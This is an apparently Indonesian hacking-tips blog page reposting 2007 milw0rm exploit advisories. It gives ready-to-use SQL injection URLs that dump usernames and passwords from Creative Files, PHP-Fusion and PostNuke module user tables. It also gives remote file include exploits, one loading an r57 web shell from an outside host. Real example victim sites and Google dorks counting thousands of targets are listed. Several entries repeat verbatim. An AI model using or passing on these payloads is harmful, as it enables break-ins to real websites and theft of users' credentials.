======================X=O=R=O=N=====================
+
+ Creative Files 1.2 (kommentare.php) Remote SQL Injection Vulnerabilities
+
======================X=O=R=O=N=====================
+
+ Bulan: xoron
+
+ xoron.biz
+
======================X=O=R=O=N=====================
+
+ SQL INJ:
+
+ kommentare.php?dlid=-1/**/UNION/**/SELECT/**/null,null,null,name,null,PASSWORD,null/**/FROM/**/user/*
+
======================X=O=R=O=N=====================
+
+ Vendor site: http://www.thecreativeheads.de/CreativeFiles/downloads.php
+
======================X=O=R=O=N=====================
+
+ Thnx: pang0, unique
+
======================X=O=R=O=N=====================
# milw0rm.com [2007-03-16]
Tips & Trik Komputer
Sabtu, 20 Oktober 2007
PHPBB Minerva Mod <= 2.0.21 build 238a (forum.php) Remote SQL Injection Exploit
Ringkasan ini tidak tersedia. Harap
klik di sini untuk melihat postingan.
PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln
--------------------------------
PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln
--------------------------------
Bulan: xoron
xoron.biz
--------------------------------
Exploit:
index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*
--------------------------------
Exapmle: http://www.basicwallpapers.dk/infusions/arcade/
--------------------------------
Google Dork:
/infusions/arcade/ 18.000 sites:)
--------------------------------
Ekin0x / --> evilc0der.org <--
--------------------------------
# milw0rm.com [2007-04-02]
PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln
--------------------------------
Bulan: xoron
xoron.biz
--------------------------------
Exploit:
index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*
--------------------------------
Exapmle: http://www.basicwallpapers.dk/infusions/arcade/
--------------------------------
Google Dork:
/infusions/arcade/ 18.000 sites:)
--------------------------------
Ekin0x / --> evilc0der.org <--
--------------------------------
# milw0rm.com [2007-04-02]
PHP-FUSION topliste Module (cid) Remote SQL Injection Vuln
--------------------------------
PHP-FUSION topliste Module (cid) Remote SQL Injection Vuln
--------------------------------
Bulan: xoron - unique
xoron.biz
--------------------------------
Exploit:
index.php?cid=-1/**/UNION/**/SELECT/**/0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/fusion_users/*
--------------------------------
Exapmle: http://www.321spil.dk/infusions/topliste/
--------------------------------
Google Dork:
infusions/topliste/ 990 sites:)
--------------------------------
Ekin0x / --> evilc0der.org <--
--------------------------------
# milw0rm.com [2007-04-02]
PHP-FUSION topliste Module (cid) Remote SQL Injection Vuln
--------------------------------
Bulan: xoron - unique
xoron.biz
--------------------------------
Exploit:
index.php?cid=-1/**/UNION/**/SELECT/**/0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/fusion_users/*
--------------------------------
Exapmle: http://www.321spil.dk/infusions/topliste/
--------------------------------
Google Dork:
infusions/topliste/ 990 sites:)
--------------------------------
Ekin0x / --> evilc0der.org <--
--------------------------------
# milw0rm.com [2007-04-02]
PostNuke pnFlashGames Module v1.5 REmote SQL Injection
============================================================
PostNuke pnFlashGames Module v1.5 REmote SQL Injection
============================================================
Bulan: xoron
xoron.biz
+
Love's the funeral of hearts
The funeral of hearts
And a plea for mercy
When love is a gun
Separating me from you
:(
============================================================
Exploit:
index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13/**/from/**/pn_users/**/where/**/pn_uid=2/*
============================================================
Example: http://andersonvision.com/PostNuke/
============================================================
# milw0rm.com [2007-04-28]
PostNuke pnFlashGames Module v1.5 REmote SQL Injection
============================================================
Bulan: xoron
xoron.biz
+
Love's the funeral of hearts
The funeral of hearts
And a plea for mercy
When love is a gun
Separating me from you
:(
============================================================
Exploit:
index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13/**/from/**/pn_users/**/where/**/pn_uid=2/*
============================================================
Example: http://andersonvision.com/PostNuke/
============================================================
# milw0rm.com [2007-04-28]
IntegralMOD
------------------------
Found: xoron
------------------------
Vendor: http://www.integramod.nl/forum/portal.php
Download: http://sourceforge.net/project/showfiles.php?group_id=191355
------------------------
Exploit:
includes/archive/archive_topic.php?phpbb_root_path=http://meto5757.by.ru/shells/r57.txt?
------------------------
Kral kraldır!
------------------------
# milw0rm.com [2007-09-27]
Found: xoron
------------------------
Vendor: http://www.integramod.nl/forum/portal.php
Download: http://sourceforge.net/project/showfiles.php?group_id=191355
------------------------
Exploit:
includes/archive/archive_topic.php?phpbb_root_path=http://meto5757.by.ru/shells/r57.txt?
------------------------
Kral kraldır!
------------------------
# milw0rm.com [2007-09-27]
phpBB Openid 0.2.0 Remote File Include
============================================
= =
= XORON (c) 2007 =
= =
============================================
= =
= phpBB Openid 0.2.0 Remote File Include =
= =
============================================
=
= Download:
= http://sourceforge.net/project/showfiles.php?group_id=178846
=
============================================
=
= Exploit:
= /includes/openid/Auth/OpenID/BBStore.php?openid_root_path=shell?
=
============================================
= =
= Special thanks "k1tkat" :) =
= =
============================================
# milw0rm.com [2007-09-30]
= =
= XORON (c) 2007 =
= =
============================================
= =
= phpBB Openid 0.2.0 Remote File Include =
= =
============================================
=
= Download:
= http://sourceforge.net/project/showfiles.php?group_id=178846
=
============================================
=
= Exploit:
= /includes/openid/Auth/OpenID/BBStore.php?openid_root_path=shell?
=
============================================
= =
= Special thanks "k1tkat" :) =
= =
============================================
# milw0rm.com [2007-09-30]
Langganan:
Postingan (Atom)
Arsip Blog
-
▼
2007
(36)
-
▼
Oktober
(19)
- Creative Files 1.2 (kommentare.php) Remote SQL In...
- PHPBB Minerva Mod <= 2.0.21 build 238a (forum.php)...
- PHP-FUSION Arcade Module (cid) Remote SQL Injectio...
- PHP-FUSION topliste Module (cid) Remote SQL Inject...
- PostNuke pnFlashGames Module v1.5 REmote SQL Injec...
- IntegralMOD
- phpBB Openid 0.2.0 Remote File Include
- Joomla com_wmtgallery Remote File Include
- Joomla com_colorlab Remote File Include
- KwsPHP 1.0 mg2 Module Remote SQL Injection Exploit
- WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remo...
- ClassWeb <= 2.03 Remote File Include Vulnerabilities
- Webavis Remote file inclusion (root)
- Dagger-web engine(cal.func.php)Remote File Inclusion
- EVA-Web 1.1
- IBM Rational ClearQuest Web Login Bypass (SQL Inje...
- webED 0.8999
- WebDesktop 0.1
- cara menggunakan exploit di site http://milw0rm.com
-
▼
Oktober
(19)
Mengenai Saya
- ..::cr4wl3r::..
- In Your Mind, In Your Mind, Indonesia
- Tidak gampang ngaku hacker!!!!